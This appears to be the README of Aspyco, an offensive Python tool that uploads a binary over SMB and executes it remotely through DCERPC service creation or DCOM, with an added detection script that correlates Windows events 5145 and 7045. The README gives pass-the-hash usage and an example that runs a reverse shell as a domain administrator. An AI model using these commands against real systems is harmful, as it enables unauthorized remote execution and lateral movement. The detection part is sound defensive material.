Aspyco is a Python script that uploads a local binary over SMB to a remote host.
It then connects remotely to a named pipe over DCERPC, or uses DCOM, to create and execute your payload.
It's a psexec-like with custom execution!
On Windows, the RPC protocol permits calling remote functions.
Remotely, you can connect to an SMB named pipe and call those functions with the DCERPC protocol.
That way, you can upload a binary file over SMB and then call functions
to create a service that executes your payload.
You can also remotely execute binaries with WMI through a DCOM connection.
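Seen from the target, the procedure above leaves two artifacts in the Windows event log: an executable written to an administrative share over SMB (Security event 5145, detailed file share access) followed shortly by a service install pointing at that file (System event 7045, new service installed). The DCERPC methods additionally open the `svcctl` or `atsvc` named pipe on IPC$, which 5145 also records. The script below is an added detection example, not part of Aspyco or its README; the event IDs and pipe names are real, but the simplified log format, host names, service name and addresses are constructed for the example.

```python
"""Correlate an SMB upload to an administrative share with a service install
pointing at the same file name: the host-side trace of an upload-then-SVCCTL
execution. Added detection example, not part of Aspyco. Event IDs are real
Windows events (Security 5145: detailed file share access; System 7045: new
service installed); the log format, hosts and addresses below are constructed."""
from datetime import datetime, timedelta
import ntpath

ADMIN_SHARES = {"ADMIN$", "C$"}          # shares that expose the system drive
WINDOW = timedelta(minutes=5)            # max gap between file write and service install
RPC_PIPES = {"svcctl": "DCERPC-SVCCTL",  # named pipe -> Aspyco method that uses it
             "atsvc": "DCERPC-ATSVC"}

# Constructed sample events, one per line: ISO timestamp then key=value fields.
SAMPLE_LOG = r"""
2024-05-01T10:00:01 host=SRV01 id=5145 share=\\*\ADMIN$ target=custom_reverse_shell.exe access=WriteData src=10.0.0.50 user=administrator
2024-05-01T10:00:02 host=SRV01 id=5145 share=\\*\IPC$ target=svcctl access=ReadData src=10.0.0.50 user=administrator
2024-05-01T10:00:03 host=SRV01 id=7045 service=aspyco_svc image=%SystemRoot%\custom_reverse_shell.exe account=LocalSystem
2024-05-01T12:00:00 host=SRV02 id=7045 service=LegitAgent image=C:\Agent\agent.exe account=LocalSystem
2024-05-01T13:00:00 host=SRV02 id=5145 share=\\*\ADMIN$ target=notes.txt access=WriteData src=10.0.0.51 user=bob
"""


def parse_line(line):
    """Turn 'TIMESTAMP k=v k=v ...' into a dict with a datetime under 'ts'."""
    ts, *fields = line.split()
    event = {"ts": datetime.fromisoformat(ts)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def load_events(text):
    return [parse_line(l) for l in text.strip().splitlines() if l.strip()]


def share_name(share):
    """'\\\\*\\ADMIN$' -> 'ADMIN$' (ntpath treats the value as a UNC root, so split by hand)."""
    return share.rsplit("\\", 1)[-1].upper()


def correlate_drop_and_service(events):
    """Alert on each 7045 whose image file was written to an admin share on the
    same host from a remote client within WINDOW before the service appeared."""
    drops = [e for e in events
             if e.get("id") == "5145" and e.get("access") == "WriteData"
             and share_name(e.get("share", "")) in ADMIN_SHARES]
    alerts = []
    for svc in (e for e in events if e.get("id") == "7045"):
        image_file = ntpath.basename(svc["image"]).lower()
        for drop in drops:
            same_host = drop["host"] == svc["host"]
            same_file = drop["target"].rsplit("\\", 1)[-1].lower() == image_file
            gap = svc["ts"] - drop["ts"]
            if same_host and same_file and timedelta(0) <= gap <= WINDOW:
                alerts.append({
                    "host": svc["host"], "service": svc["service"],
                    "image": svc["image"], "src": drop["src"],
                    "user": drop["user"], "gap_seconds": gap.total_seconds(),
                })
    return alerts


def rpc_pipe_opens(events):
    """List remote opens of the IPC$ named pipes behind the DCERPC methods."""
    return [(e["src"], e["target"].lower(), RPC_PIPES[e["target"].lower()])
            for e in events
            if e.get("id") == "5145" and share_name(e.get("share", "")) == "IPC$"
            and e.get("target", "").lower() in RPC_PIPES]


if __name__ == "__main__":
    events = load_events(SAMPLE_LOG)
    for alert in correlate_drop_and_service(events):
        print("service install after SMB drop:", alert)
    for src, pipe, method in rpc_pipe_opens(events):
        print(f"{src} opened \\pipe\\{pipe} ({method})")
```

Event 5145 only exists when "Audit Detailed File Share" is enabled, and 7045 carries no client address, so the source IP and account come from the share-access event matched on host, file name and time window; the second service (`LegitAgent`) and the unrelated text file write are there to show the correlation does not fire on an ordinary install or an ordinary upload alone.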
From source:

```
git clone https://github.com/ProcessusT/Aspyco
cd Aspyco
python3 aspyco.py -h
```
Aspyco uses Impacket syntax:

```
usage: aspyco.py [-h] [-payload PAYLOAD] [-listener_ip LISTENER_IP] [-listener_port LISTENER_PORT] [-method METHOD] [-hashes LMHASH:NTHASH] target

Upload and start your custom payloads remotely !

positional arguments:
  target                        [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help                    show this help message and exit
  -payload PAYLOAD              Your custom binary file
  -listener_ip LISTENER_IP      Listener ip address if no custom payload is specified
  -listener_port LISTENER_PORT  Listener port if no custom payload is specified
  -method METHOD                {"DCERPC-SVCCTL", "DCERPC-ATSVC", "DCOM"} - Default : DCERPC-SVCCTL
  -hashes LMHASH:NTHASH         NTLM hashes, format is LMHASH:NTHASH
```

Example:

```
aspyco -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 custom_reverse_shell.exe
```